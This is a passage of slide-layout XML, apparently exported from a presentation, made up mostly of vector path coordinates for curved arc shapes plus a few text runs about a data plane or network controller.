                <a:lnTo>
                  <a:pt x="2563787" y="1720481"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2578176" y="1675536"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2590863" y="1630184"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2601861" y="1584490"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2611170" y="1538490"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2618790" y="1492250"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2624709" y="1445806"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2628938" y="1399209"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2631478" y="1352524"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2632316" y="1305775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312532" y="4541291"/>
            <a:ext cx="1793875" cy="1173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4100"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-25">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Data</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-12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404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>pla</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-50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5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9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404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>or  </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-30">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>network </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-2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404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>controller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881076" y="3814101"/>
            <a:ext cx="2631440" cy="2611755"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2631440" h="2611754">
                <a:moveTo>
                  <a:pt x="248196" y="624166"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="215557" y="591781"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="189445" y="632548"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="165036" y="674065"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="142303" y="716267"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="121246" y="759129"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="101879" y="802589"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="84201" y="846582"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="68199" y="891082"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="53886" y="936028"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="41262" y="981379"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="30314" y="1027074"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21043" y="1073073"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13474" y="1119314"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7581" y="1165758"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3365" y="1212354"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="838" y="1259039"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1305775"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="838" y="1352524"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3365" y="1399209"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7581" y="1445806"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13474" y="1492250"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21043" y="1538490"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="30314" y="1584490"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="41262" y="1630184"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="53886" y="1675536"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="68199" y="1720481"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="84201" y="1764982"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="101879" y="1808975"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="121246" y="1852434"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="142303" y="1895297"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="165036" y="1937499"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="189445" y="1979015"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="215557" y="2019769"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="248196" y="1987384"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="222300" y="1945551"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="198196" y="1902955"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="175869" y="1859686"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="155333" y="1815769"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="136588" y="1771269"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="119621" y="1726234"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="104444" y="1680718"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="91059" y="1634782"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="79451" y="1588477"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="69634" y="1541843"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="61595" y="1494955"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="55346" y="1447850"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="50876" y="1400581"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="48196" y="1353210"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="47307" y="1305788"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="48196" y="1258354"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="50876" y="1210983"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="55346" y="1163713"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="61595" y="1116609"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="69634" y="1069721"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="79451" y="1023086"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="91059" y="976782"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="104444" y="930846"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="119621" y="885329"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="136588" y="840295"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="155333" y="795794"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="175869" y="751878"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="198196" y="708609"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="222300" y="666013"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="248196" y="624166"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="2631440" h="2611754">
                <a:moveTo>
                  <a:pt x="1084872" y="2372576"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1036624" y="2361082"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="989253" y="2347518"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="942797" y="2331974"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="897305" y="2314460"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="852817" y="2295055"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="809396" y="2273795"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="767092" y="2250744"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="725944" y="2225929"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="686028" y="2199424"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="647357" y="2171255"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="610019" y="2141486"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="574027" y="2110168"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="539470" y="2077351"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="506361" y="2043087"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="474776" y="2007412"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="444754" y="1970379"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="416356" y="1932051"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="389610" y="1892465"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="364591" y="1851685"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="341337" y="1809737"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="319900" y="1766697"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="300329" y="1722602"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="282676" y="1677504"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="266979" y="1631442"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="253314" y="1584477"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="241719" y="1536661"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="202476" y="1536661"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="213690" y="1585226"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="226949" y="1632940"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="242214" y="1679752"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="259435" y="1725625"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="278561" y="1770494"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="299542" y="1814347"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="322326" y="1857095"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="346887" y="1898726"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="373164" y="1939175"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="401091" y="1978393"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="430657" y="2016340"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="461784" y="2052955"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="494436" y="2088210"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="528561" y="2122043"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="564121" y="2154415"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="601065" y="2185276"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="639330" y="2214588"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="678891" y="2242274"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="719683" y="2268321"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="761669" y="2292667"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="804799" y="2315260"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="849020" y="2336050"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="894283" y="2355011"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="940549" y="2372068"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="987767" y="2387193"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1035888" y="2400338"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1084872" y="2411438"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1084872" y="2372576"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="2631440" h="2611754">
                <a:moveTo>
                  <a:pt x="1084872" y="200113"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1035888" y="211277"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="987767" y="224459"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="940549" y="239649"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="894283" y="256781"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="849020" y="275793"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="804799" y="296672"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="761669" y="319341"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="719683" y="343776"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="678891" y="369900"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="639330" y="397700"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="601065" y="427101"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="564121" y="458063"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="528561" y="490550"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="494436" y="524510"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="461784" y="559879"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="430657" y="596633"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="401091" y="634707"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="373164" y="674052"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="346887" y="714641"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="322326" y="756412"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="299542" y="799312"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="278561" y="843305"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="259435" y="888339"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="242214" y="934364"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="226949" y="981341"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="213690" y="1029220"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="202476" y="1077937"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="241719" y="1077937"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="253314" y="1029970"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="266979" y="982853"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="282676" y="936637"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="300329" y="891387"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="319900" y="847140"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="341337" y="803948"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="364591" y="761860"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="389610" y="720940"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="416356" y="681228"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="444754" y="642759"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="474776" y="605599"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="506361" y="569810"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="539470" y="535419"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="574027" y="502488"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="610019" y="471055"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="647357" y="441185"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="686028" y="412915"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="725944" y="386308"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="767092" y="361416"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="809396" y="338277"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="852817" y="316941"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="897305" y="297459"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="942797" y="279882"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="989253" y="264274"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1036624" y="250659"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1084872" y="239102"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1084872" y="200113"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="2631440" h="2611754">
                <a:moveTo>
                  <a:pt x="2037372" y="2398103"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2004733" y="2365718"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1962480" y="2391359"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1919490" y="2415222"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1875802" y="2437320"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1831454" y="2457653"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1786534" y="2476208"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1741055" y="2493010"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1695107" y="2508034"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1648726" y="2521293"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1601965" y="2532786"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1554886" y="2542502"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1507528" y="2550464"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1459966" y="2556649"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1412240" y="2561069"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1364399" y="2563723"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1316520" y="2564612"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1268628" y="2563723"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1220787" y="2561069"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1173060" y="2556649"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1125499" y="2550464"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1078141" y="2542502"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1031062" y="2532786"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="984300" y="2521293"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="937920" y="2508034"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="891971" y="2493010"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="846493" y="2476208"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="801573" y="2457653"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="757224" y="2437320"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="713536" y="2415222"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="670547" y="2391359"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="628307" y="2365718"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="595668" y="2398103"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="636816" y="2423960"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="678738" y="2448141"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="721347" y="2470645"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="764628" y="2491498"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="808494" y="2510675"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="852919" y="2528189"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="897851" y="2544026"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="943229" y="2558199"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="989012" y="2570708"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1035138" y="2581541"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1081582" y="2590723"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1128268" y="2598229"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1175156" y="2604058"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1222184" y="2608224"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1269326" y="2610726"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1316507" y="2611564"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1363700" y="2610726"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1410843" y="2608224"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1457871" y="2604058"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1504759" y="2598229"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1551444" y="2590723"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1597888" y="2581541"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1644015" y="2570708"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1689798" y="2558199"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1735175" y="2544026"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1780108" y="2528189"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1824532" y="2510675"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1868398" y="2491498"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1911680" y="2470645"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1954288" y="2448141"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1996211" y="2423960"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2037372" y="2398103"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="2631440" h="2611754">
                <a:moveTo>
                  <a:pt x="2037372" y="213448"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1996211" y="187604"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1954288" y="163423"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1911680" y="140919"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1868398" y="120065"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1824532" y="100888"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1780108" y="83375"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1735175" y="67538"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1689798" y="53365"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1644015" y="40855"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1597888" y="30022"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1551444" y="20840"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1504759" y="13335"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1457871" y="7505"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1410843" y="3340"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1363700" y="838"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1316520" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1269326" y="838"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1222184" y="3340"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1175156" y="7505"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1128268" y="13335"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1081582" y="20840"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1035138" y="30022"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="989012" y="40855"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="943229" y="53365"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="897851" y="67538"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="852919" y="83375"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="808494" y="100888"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="764628" y="120065"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="721347" y="140919"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="678738" y="163423"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="636816" y="187604"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="595668" y="213448"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="628307" y="245833"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="670547" y="220205"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="713536" y="196342"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="757224" y="174244"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="801573" y="153911"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="846493" y="135343"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="891971" y="118554"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="937920" y="103530"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="984300" y="90271"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1031062" y="78778"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1078141" y="69049"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1125499" y="61099"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1173060" y="54914"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1220787" y="50495"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1268628" y="47840"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1316507" y="46964"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1364399" y="47840"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1412240" y="50495"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1459966" y="54914"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1507528" y="61099"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1554886" y="69049"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1601965" y="78778"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1648726" y="90271"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1695107" y="103530"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1741055" y="118554"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1786534" y="135343"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1831454" y="153911"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1875802" y="174244"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1919490" y="196342"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1962480" y="220205"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2004733" y="245833"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2037372" y="213448"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="2631440" h="2611754">
                <a:moveTo>
                  <a:pt x="2429040" y="1536661"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2389797" y="1536661"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2378189" y="1584477"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2364524" y="1631442"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2348827" y="1677504"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2331174" y="1722602"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2311603" y="1766697"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2290165" y="1809737"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2266912" y="1851685"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2241893" y="1892465"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2215146" y="1932051"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2186749" y="1970379"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2156726" y="2007412"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2125141" y="2043087"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2092032" y="2077351"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2057476" y="2110168"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2021484" y="2141486"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1984146" y="2171255"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1945474" y="2199424"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1905558" y="2225929"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1864410" y="2250744"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1822107" y="2273795"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1778685" y="2295055"/>
